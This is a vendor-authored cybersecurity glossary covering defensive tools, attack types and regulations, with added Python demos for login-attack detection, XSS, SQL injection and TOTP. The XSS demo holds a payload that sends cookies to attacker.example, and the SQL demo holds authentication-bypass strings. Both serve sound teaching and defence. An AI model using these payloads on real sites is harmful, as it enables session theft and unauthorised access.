The world of cybersecurity constantly changes, so ongoing education is the key to understanding today’s new threats. But how do you even begin? It all starts with a firm grasp of terminology. However, knowing all of the different terms can feel overwhelming. Don't worry! We're here to support you.
Here are a variety of important terms, attack types, regulations, commonly asked questions and even actionable steps to learn more about the basics of cybersecurity.
Cybersecurity 101: Definitions to Know
What Is Cybersecurity?
Is there a better place to start? ‘Cybersecurity’ is a set of techniques for protecting an organisation’s digital infrastructure – including networks, systems and applications – from being compromised by attackers and other threat actors. Cybersecurity combines technology, people and processes to create strategies aimed at protecting sensitive data, ensuring business continuity and safeguarding against financial losses.
What Are The Types of Cybersecurity Solutions?
Anti-virus is a type of IT security software that scans for, detects, blocks and eliminates malware. AV programs will typically run in the background, scanning for known malware signatures and behaviour patterns that may indicate the presence of malware.
Endpoint detection and response is a category of tools and solutions that focus on detecting, investigating and mitigating suspicious activity on endpoints and hosts. The value of EDR is in its ability to detect advanced threats that may not have a known behavioural pattern or malware signature. EDR can also trigger an adaptive response based on the nature of detected threats. Arctic Wolf’s security offerings complement EDR solutions to provide a higher level of overall security.
Managed detection and response is a component of SOC-as-a-service that offers comprehensive solutions for continuous monitoring, threat detection and incident response by a third-party supplier. It's a holistic, turnkey solution for real-time, advanced threat management that helps in-house IT teams to prioritise incidents and improve their organisation’s security posture.
A network operations centre (NOC) is a central location from which network administrators monitor, manage and control one or more networks, often across geographically distributed sites. NOC engineers deal with DDoS attacks, power outages, network failures and routing black holes. A NOC is not a security solution: its focus is availability and performance, and an organisation with a NOC – or NOC services – is not thereby protected from advanced cyberthreats.
A security operations centre is the combination of cybersecurity personnel, threat detection and incident response processes and supporting security technologies that make up an organisation’s security operations. Larger enterprises typically build and manage a SOC in-house. Organisations of every size may choose to outsource their SOC to a SOC-as-a-service provider like Arctic Wolf.
SIEM stands for security information and event management. SIEM is an integrated tool that collects and aggregates security events and alerts from different security products. The SIEM software analyses and correlates those events to identify potential threats inside an organisation’s environment.
Vulnerability management solutions identify, track and prioritise internal and external cybersecurity vulnerabilities, optimising cyberattack prevention activities such as patching, upgrades and configuration fixes. Arctic Wolf Managed Risk is a market-leading continuous VM service.
Vulnerability assessment is the process of identifying, classifying and prioritising vulnerabilities in business systems. Assessments can focus on internal, external or host-based vulnerabilities.
What are the Different Types of Cyberattacks?
A brute-force attack is an attempt by a malicious actor to gain unauthorised access to a system by systematically trying candidate passwords (or keys) until one works – either every possible combination or, more commonly, a dictionary of likely passwords against a single account. Arctic Wolf MDR service tracks login attempts and failures and can detect brute-force attacks.
Consent phishing is a variant of phishing in which the attacker tricks users into authorising a malicious app or integration – typically through a legitimate-looking OAuth consent prompt – rather than into handing over a password. Once the app is authorised, its access token can be used to compromise accounts, read mail and files, exfiltrate data or pivot to further attacks, and the grant persists until the user or an administrator revokes it.
Credential stuffing attacks exploit existing databases of compromised username/password combinations. Because many people reuse passwords, attackers replay these previously breached pairs against other services – usually at high volume, one or two attempts per account, from many source addresses – in the hope that some still work.
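The two attacks above look different in authentication logs: brute force is many failures against one account from one source, while credential stuffing is one or two failures each against many accounts, and a later success from the same source means an account is probably compromised. The detection logic below is an added example written for this page, not Arctic Wolf's MDR code; the log line format, the thresholds and the sample events are all constructed assumptions.

```python
"""Telling a brute-force attack from credential stuffing in authentication logs.

Added example for this page, not Arctic Wolf's code. The log line format, the
thresholds and the sample events are all assumptions constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format: "<ISO-8601 timestamp> auth <SUCCESS|FAILURE> user=<name> src=<ip>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<result>SUCCESS|FAILURE) user=(?P<user>\S+) src=(?P<src>\S+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "ok": m["result"] == "SUCCESS",
            "user": m["user"], "src": m["src"]}


def detect(lines, window=timedelta(minutes=5), bf_threshold=10, cs_threshold=10):
    """Return sorted [((kind, src, user), count), ...] findings.

    brute_force:          one source fails >= bf_threshold times against ONE account
                          inside the window (many passwords, one user).
    credential_stuffing:  one source fails against >= cs_threshold DISTINCT accounts
                          with at most two tries each (one leaked password per user).
    success_from_flagged_source: a login that succeeded from a source already flagged,
                          i.e. that account is probably compromised and needs a reset.
    """
    events = [e for e in map(parse_line, lines) if e]
    events.sort(key=lambda e: e["ts"])
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)

    findings = {}
    for src, evs in by_src.items():
        fails = [e for e in evs if not e["ok"]]
        start = 0
        for end in range(len(fails)):              # sliding window over failures
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            per_user = defaultdict(int)
            for f in fails[start:end + 1]:
                per_user[f["user"]] += 1
            for user, n in per_user.items():
                if n >= bf_threshold:
                    key = ("brute_force", src, user)
                    findings[key] = max(findings.get(key, 0), n)
            if len(per_user) >= cs_threshold and max(per_user.values()) <= 2:
                key = ("credential_stuffing", src, "*")
                findings[key] = max(findings.get(key, 0), len(per_user))
        if any(k[1] == src for k in findings):
            for e in evs:
                if e["ok"]:
                    findings[("success_from_flagged_source", src, e["user"])] = 1
    return sorted(findings.items())


def build_sample_log():
    """Constructed sample log (not real data) exercising all three patterns."""
    base = datetime(2024, 1, 1, 12, 0, 0)
    stamp = lambda s: (base + timedelta(seconds=s)).isoformat()
    lines = [f"{stamp(0)} auth FAILURE user=bob src=192.0.2.10",      # a typo, then
             f"{stamp(20)} auth SUCCESS user=bob src=192.0.2.10"]     # a normal login
    for i in range(12):                                               # brute force on alice
        lines.append(f"{stamp(10 * i)} auth FAILURE user=alice src=203.0.113.5")
    for i in range(11):                                               # one try per account
        lines.append(f"{stamp(5 * i)} auth FAILURE user=user{i} src=198.51.100.7")
    lines.append(f"{stamp(60)} auth SUCCESS user=user11 src=198.51.100.7")  # one worked
    return lines


if __name__ == "__main__":
    for (kind, src, user), count in detect(build_sample_log()):
        print(f"{kind:28} src={src:14} user={user:8} count={count}")
```

The thresholds are deliberately simple; in production they are tuned per application, and the `success_from_flagged_source` finding is the one that should page someone, because it is the attacker's win rather than an attempt.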
Cross-site scripting (XSS) is an attack that injects malicious scripts into a legitimate and trusted website. XSS attacks exploit web applications that place untrusted input into a page without escaping it for the context (HTML body, attribute, script) in which it lands. Because the injected code runs in the victim's browser under the origin of the trusted site, it can read session cookies and other data the site exposes to scripts, perform actions as the logged-in user or rewrite the page to capture credentials. Attackers also use XSS to deliver trojans, keyloggers and other malware.
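As an added example (not code from the original page), the snippet below shows the unescaped rendering that makes XSS possible beside its hardened forms, and uses Python's own HTML parser to check what the attacker actually gained. The page fragments, the parameter and the payloads are constructed for illustration. The third renderer makes the caveat in the paragraph above concrete: escaping is only sufficient when the output context is also controlled (here, a quoted attribute).

```python
"""Reflected XSS: an unescaped template beside its hardened forms.

Added example for this page, not the page's own code. The page fragments, the
parameter and the payloads are constructed for illustration.
"""
import html
from html.parser import HTMLParser


def render_vulnerable(name):
    # Untrusted input dropped straight into HTML: the browser parses whatever
    # the attacker put in `name` as markup, so a <script> element runs in the
    # site's origin with access to its cookies and DOM.
    return f"<p>Hello, {name}!</p>"


def render_escaped_body(name):
    # html.escape() turns < > & " ' into entities, so the payload is shown as
    # text instead of being parsed as an element.
    return f"<p>Hello, {html.escape(name)}!</p>"


def render_escaped_unquoted_attr(name):
    # Escaping alone is NOT enough inside an unquoted attribute: a space ends
    # the value, so "x onmouseover=alert(1)" still becomes an event handler.
    return f"<input value={html.escape(name)}>"


def render_escaped_quoted_attr(name):
    # Quote the attribute AND escape the value: the attacker cannot close the
    # quote, so the whole payload stays inside value="...".
    return f'<input value="{html.escape(name)}">'


class _Audit(HTMLParser):
    """Parse output roughly the way a browser would and count what an attacker gained."""
    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.event_handlers = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        self.event_handlers += sum(1 for attr, _ in attrs if attr.startswith("on"))


def injected(rendered):
    """True if the rendered HTML contains a <script> element or an on* handler."""
    audit = _Audit()
    audit.feed(rendered)
    return audit.script_tags > 0 or audit.event_handlers > 0


# Constructed payloads: one for the HTML body context, one for an attribute context.
PAYLOAD_BODY = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"
PAYLOAD_ATTR = "x onmouseover=alert(1)"

if __name__ == "__main__":
    for label, out in [("vulnerable body", render_vulnerable(PAYLOAD_BODY)),
                       ("escaped body", render_escaped_body(PAYLOAD_BODY)),
                       ("escaped, unquoted attr", render_escaped_unquoted_attr(PAYLOAD_ATTR)),
                       ("escaped, quoted attr", render_escaped_quoted_attr(PAYLOAD_ATTR))]:
        print(f"{label:24} injected={injected(out)!s:5} {out}")
```

In a real application this escaping is done by the templating engine (with auto-escaping on), and a Content-Security-Policy header limits the damage when a gap is missed; neither replaces the other.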
A data breach refers to any event in which unauthorised parties access or steal sensitive information from a company. Often, this information is personally identifiable information (PII) or financial information taken for resale.
A distributed denial-of-service (DDoS) attack seeks to make a web server or online service unavailable by flooding it with more traffic or requests than it can handle. The attacker first builds a botnet – a large number of compromised devices running malware that takes orders from command-and-control (C2) infrastructure – and then directs those bots to send traffic at the target simultaneously.
DNS hijacking – closely related to DNS redirection and DNS cache poisoning – manipulates Domain Name System (DNS) resolution so that queries for a legitimate name are answered with an attacker-controlled address, typically sending users to a malicious website that serves malware, advertising or other unwanted content. DNS is the equivalent of a series of internet phone books; hijacking it essentially forces the browser to go to the wrong location, whether by compromising a resolver, altering a device's or router's DNS settings or poisoning a cache.
In a drive-by attack, the user doesn't have to download a file, click a malicious link or take any other deliberate action. Instead, malicious code is delivered automatically to the user's device – typically by exploiting a vulnerability in the browser or one of its plugins – when the user visits a compromised or malicious website.
An exploit is a malicious application or script that takes advantage of a vulnerability in endpoints and other hardware, networks or applications. Attackers typically use exploits to take control of a system or device, to steal data or to escalate access privileges. Exploits are often used as a component of a multi-layered attack.
Golden Ticket Attack
A Golden Ticket attack occurs when an attacker has obtained the secret of the Active Directory domain's Kerberos Key Distribution Center (KDC) – the password hash of the krbtgt account – which the KDC uses to sign and encrypt the Ticket Granting Tickets (TGTs) that authorise access to network resources. With that key, the attacker can forge 'Golden Tickets': TGTs for any user, with any group membership and an arbitrary lifetime, granting access to resources across the domain. Because the tickets are forged offline, resetting ordinary user passwords does not stop them; the krbtgt password must be reset (twice) to invalidate them.
Malware is any software written to harm, control or spy on a system, its users or its data; viruses, worms, trojans, ransomware and spyware are all malware. It commonly spreads via an email attachment or a link to a malicious website and infects the endpoint when a user opens the attachment or clicks the link, although other delivery routes – exploited vulnerabilities, removable media and compromised software updates – are also common.
Ransomware is a type of malicious software (malware) that prevents the end user from accessing a system or data. The most common form is crypto ransomware, which makes data or files unreadable through encryption and requires a decryption key to restore access. Another form – locker ransomware – locks access to the device rather than encrypting files. Attackers typically demand a payment – usually in cryptocurrency such as bitcoin – to decrypt files or restore access, and increasingly also steal data before encrypting it and threaten to publish it if the ransom is not paid.
Supply Chain Attack
A supply chain attack occurs when a threat actor is able to attack a target by means of compromising a third-party resource. In many circumstances, the compromised supplier is not the final target but is instead used as the method to exploit or gain access to the intended victim. In some situations, a supply chain attack might include numerous additional victims who were not necessarily the final intended target.
A web shell is a malicious script (for example in PHP, ASP.NET or JSP) that a threat actor uploads to, or plants on, a web server so that it can be reached over HTTP and used to execute commands on the host. Often the upload abuses a vulnerability in the target application, such as an unrestricted file upload, and the shell then gives the threat actor a persistent command-line interface – running with the privileges of the web server process – for executing commands, moving files and pivoting further into the network.
What Happens During a Ransomware Attack?
During a ransomware campaign, attackers often use phishing and social engineering to get a computer user to click on an attachment or a link to a malicious website. Some ransomware attacks, however, don't require user action because they exploit vulnerabilities in exposed services or computers to deliver the payload. Victims typically learn they have been hit when the attack launches an on-screen notification with the ransom demand – but by then the files are already encrypted, and the attackers may have been inside the environment for days, stealing data before triggering the encryption.
Phishing is a social-engineering attack, most often delivered by email, that tricks users into surrendering their credentials or running malicious content. The email may appear legitimate – as if coming from your bank – and ask you to reset your password. In a spear-phishing attack, an individually crafted email targets a key executive or decision maker. Arctic Wolf MDR can detect and warn you of phishing and spear-phishing.
Security misconfigurations result from the failure to properly implement security controls on devices, networks, cloud applications, firewalls and other systems, and can lead to data breaches, unauthorised access and other security incidents. Misconfigurations can include anything from default admin credentials, open ports and unpatched software, to unused web pages and unprotected files.
SQL injection is a technique in which an attacker supplies input that a web application concatenates into a structured query language (SQL) statement, so that part of the input is executed as SQL rather than treated as data. Web applications use SQL to communicate with their databases, and injection is possible wherever user-supplied values – login credentials, search terms, URL parameters – are built into a query by string concatenation instead of being passed as bound parameters. Attackers use SQL injection to read or modify database contents, bypass authentication by spoofing a user's identity and, on some database platforms, execute operating-system commands.
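The login case described above, as an added example that is not code from the original page: a string-built query that a tautology or a comment sequence bypasses, beside the parameterised query that treats the same input as plain data. The schema, rows and payloads are constructed for illustration, and passwords are stored in clear text only to keep the injection itself visible (a real system stores hashes).

```python
"""SQL injection: a string-built login query beside its parameterised form.

Added example for this page, not the page's own code. The schema, the rows and
the payloads are constructed for illustration; passwords are stored in clear
text only to keep the injection itself visible (a real system stores hashes).
"""
import sqlite3


def setup_db():
    """In-memory SQLite database with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("admin", "correct horse battery staple", "admin"),
                      ("alice", "hunter2", "user")])
    return conn


def login_vulnerable(conn, username, password):
    # The inputs are concatenated into the statement text, so a quote in either
    # field ends the string literal and the rest is parsed as SQL.
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchone()


def login_parameterised(conn, username, password):
    # Placeholders: the statement is compiled first and the values are bound
    # afterwards, so a quote in `password` is just a character in a string.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


# Constructed payloads.
TAUTOLOGY = "' OR '1'='1"   # password field: ... AND password = '' OR '1'='1'
COMMENT_OUT = "admin'--"    # username field: ... username = 'admin'--' AND ...

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable, tautology    :", login_vulnerable(db, "admin", TAUTOLOGY))
    print("vulnerable, comment      :", login_vulnerable(db, COMMENT_OUT, "anything"))
    print("parameterised, tautology :", login_parameterised(db, "admin", TAUTOLOGY))
    print("parameterised, real creds:", login_parameterised(db, "alice", "hunter2"))
```

The tautology works because `AND` binds tighter than `OR`, so the `WHERE` clause becomes `(username = 'admin' AND password = '') OR '1'='1'` and matches every row; the comment payload simply discards the password check. Neither has any effect on the parameterised query.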
A Trojan horse is typically a legitimate-looking but malicious code or application that can be used for a variety of nefarious actions, including to steal, delete or modify data – and disrupt computers or a network. Trojans have different categories, such as exploits, backdoors and rootkits.
What Are Some of the Different Kinds of Cybersecurity Compliance Regulations?
The California Consumer Privacy Act (CCPA) applies to for-profit businesses that do business in California and meet certain thresholds – based on annual revenue, the volume of consumers' personal information handled or the share of revenue derived from selling personal information – regardless of the business' physical location or presence in the state. CCPA enables consumers to request information on what data the business collects about them and for what purposes. Businesses below those thresholds are exempt.
The Cybersecurity Maturity Model Certification (CMMC) is a unifying standard for cybersecurity across Department of Defense contractors. The original model defined five maturity levels; the revised CMMC 2.0 consolidates these into three. Meeting and certifying at the correct CMMC level is increasingly necessary to bid on DoD contracts and do business with the department.
The Defense Federal Acquisition Regulation Supplement (DFARS) supplements the Federal Acquisition Regulation (FAR). DFARS is administered by the Department of Defense (DoD), and its cybersecurity clauses apply to DoD contractors that process, store or transmit unclassified but sensitive information such as controlled unclassified information (CUI).
The Federal Financial Institutions Examination Council (FFIEC) is an interagency federal body that sets uniform standards for regulated financial institutions. It provides a Cybersecurity Assessment Tool to help institutions identify their risk and track their cybersecurity preparedness.
The General Data Protection Regulation (GDPR) is a legal framework that sets rules for the collection and processing of individuals' personal data within the European Union (EU). Organisations must comply regardless of their physical location or presence in the EU if they process or store the personal data of individuals in the EU.
Gramm-Leach-Bliley Act
The Gramm-Leach-Bliley Act (GLBA) requires financial institutions and other entities that provide financial products – including loans, insurance and investment advice – to safeguard sensitive customer data and to explain their information-sharing practices to customers.
The Health Insurance Portability and Accountability Act protects the privacy of patient health records. Title II, in particular, governs the secure storage, processing, transfer and access of electronic protected health information (ePHI). HIPAA imposes compliance requirements on healthcare providers and related companies. Arctic Wolf helps customers to meet HIPAA compliance goals.
The National Institute of Standards and Technology is a non-regulatory entity under the umbrella of the United States Department of Commerce. NIST Publication Series 800 provides a comprehensive listing of information security measures and controls based on extensive research. Arctic Wolf delivers prevention, detection and response functions as defined by NIST.
The Payment Card Industry Data Security Standard (PCI DSS) was developed to protect credit, debit and cash card transactions and prevent the misuse of cardholders' data by any company or merchant that handles it electronically. PCI DSS imposes compliance requirements on every entity that stores, processes or transmits cardholder data. Arctic Wolf helps customers to meet PCI compliance goals.
Sarbanes-Oxley Act (SOX)
The Sarbanes-Oxley Act (SOX) sets expanded regulatory requirements governing all US public companies, foreign companies with securities registered with the Securities and Exchange Commission and public accounting firms. The primary goal of SOX is to prevent fraudulent financial reporting and protect investors; for IT teams, that means demonstrating controls over the systems that produce and store financial records.
What Are Managed Security Services?
Managed security is a service or solution provided by an outside supplier – typically as a subscription model – to manage and oversee a specific security aspect. Organisations typically use managed security services to either completely outsource their security functions or to scale their needs to complement their in-house capabilities.
What Is an MSSP?
A managed security service provider (MSSP) is a supplier that manages and monitors an organisation’s security 24×7. MSSP services may include, among others, deployment of security infrastructure, monitoring endpoints and managing network security.
What is SOC-as-a-Service?
SOC-as-a-service is a subscription-based, outsourced alternative to an in-house security operations centre (SOC). A SOC-as-a-service supplier offers a comprehensive set of solutions, such as managed detection and response, and provides organisations with a dedicated team of experts who are available around the clock to detect, monitor and respond to incidents. SOC-as-a-service combines people, processes and technology to deliver cost-effective cybersecurity and help organisations maintain compliance.
Additional Cybersecurity Terms to Know
An API (application programming interface) is a computing interface that defines and standardises interactions between two pieces of software. APIs are an invaluable source of data for security operations, especially when collecting information from security tools or cloud platforms.
An Advanced Persistent Threat – or APT – is a sophisticated threat actor, commonly a nation state or state-sponsored group. In most cases, these groups are highly skilled and driven by political or economic motives. Compared with less sophisticated threat actors, an APT will generally work in a slower, more methodical fashion, attempting to remain undetected while embedding itself deeper into the target's environment.
CASB (Cloud Access Security Broker) is software that sits between cloud services and cloud users, monitoring activity and enforcing security policies.
CSPM (or SSPM)
Cloud Security Posture Management (or, for SaaS applications, SaaS Security Posture Management) is the practice of continuously benchmarking and managing cloud or SaaS instances: identifying misconfigurations and other weaknesses, then prioritising and remediating those cloud risks. It can be facilitated by CSPM tools or delivered as a service by CSPM providers.
The dark web comprises internet resources, such as websites and forums, that are not indexed by or reachable through ordinary search engines and browsers. Because it is hidden from the public and reached through anonymising browsers and protocols, it hosts a large amount of criminal or illicit activity – including markets for stolen credentials and data – and is difficult to track and control.
Identity and Access Management is the practice of ensuring that only the correct individuals have access to an organisation's resources – at the right times, for the right reasons.
MFA/2FA (multi-factor authentication/two-factor authentication) are authentication methods that require users to present more than one kind of evidence – for example a password plus a code generated on or sent to another device, or a hardware security key – before a system grants access to a service or account. MFA defends against attacks that rely only on a stolen or guessed password, such as brute force, credential stuffing and phishing, and is rapidly becoming a universal security standard in business technology. One caveat: one-time codes can still be captured and relayed by a phishing site in real time, which is why phishing-resistant methods such as hardware security keys are preferred for high-value accounts.
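The "code generated on another device" factor is usually TOTP. The block below is an added example, not code from the original page, implementing HOTP (RFC 4226) and TOTP (RFC 6238) with the standard library and a server-side verifier that tolerates clock drift; the key is the RFC test-vector secret, not a real credential, and the replay check mentioned in the comments is described but not implemented.

```python
"""HOTP and TOTP (RFC 4226 / RFC 6238): how the "code from another device" factor works.

Added example for this page, not the page's own code; standard library only.
The key below is the RFC test-vector secret, not a real credential.
"""
import hashlib
import hmac
import struct
import time

RFC_SECRET = b"12345678901234567890"   # shared secret from RFC 4226 Appendix D


def hotp(secret, counter, digits=6, algo=hashlib.sha1):
    """RFC 4226: HMAC(secret, counter) -> dynamic truncation -> zero-padded decimal code."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F                       # low nibble of last byte picks 4 bytes
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, for_time=None, step=30, digits=6, algo=hashlib.sha1):
    """RFC 6238: HOTP with counter = floor(unix_time / step); both sides compute it."""
    t = int(time.time()) if for_time is None else for_time
    return hotp(secret, t // step, digits, algo)


def verify_totp(secret, candidate, for_time=None, step=30, digits=6, skew=1):
    """Server-side check: accept the current step and +/- `skew` steps for clock drift,
    compared in constant time. A real server also records the step of every accepted
    code and refuses it a second time, otherwise a phished code can be replayed."""
    t = int(time.time()) if for_time is None else for_time
    counter = t // step
    return any(hmac.compare_digest(hotp(secret, counter + d, digits), candidate)
               for d in range(-skew, skew + 1))


if __name__ == "__main__":
    print("HOTP counters 0..2      :", [hotp(RFC_SECRET, c) for c in range(3)])
    print("TOTP at T=59 (8 digits) :", totp(RFC_SECRET, for_time=59, digits=8))
    print("current 6-digit TOTP    :", totp(RFC_SECRET))
```

Because the code is derived only from the shared secret and the clock, anyone who obtains the secret (a screenshot of the enrolment QR code, a backup of the authenticator database) can generate valid codes indefinitely; the secret must be protected like a password on both the device and the server.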
What Are the Necessary Steps to Protect Against Cyber Threats?
You cannot protect what you don't know you have – the first step in protecting against threats is to inventory your environment and identify its vulnerabilities. A risk assessment helps you to identify and manage those vulnerabilities. Once you perform a vulnerability scan, you can prioritise mitigation steps based on the top risks. Because your environment changes continuously, your risks change too, so identifying vulnerabilities should be a continuous, ongoing process rather than a one-off exercise.
To protect your IT infrastructure against threats, you need multi-layered defences across your perimeter, as well as anywhere your data resides or is accessed. This includes your cloud applications and workloads, BYOD devices and any place where users may access your network and sensitive resources.
Threats will slip through, as no protection is foolproof, no matter how many layers you have. Detection helps you to find the threats that got past your defences, whether that's never-before-seen malware or an attacker using stolen credentials. You should monitor your environment 24x7, and detection can't rely on technology alone: you need skilled security analysts who can make the kind of decisions that require human judgement.
The quicker you respond, the better your chances of limiting the ‘blast radius’ – the damage an attack can inflict on your organisation – and prevent data exfiltration. In addition to analysts to monitor alerts, your security team needs responders who can quickly make decisions to minimise an incident. Automating some of the response actions will also speed up the remediation cycle.
Recovery is the final step after an incident, and recovery preparedness includes more than simply ensuring data backup. After an attack, you need to quickly restore affected systems and operations, in addition to ensuring that the threat is eradicated. It's also highly recommended to include data recovery processes and procedures in your disaster recovery plan.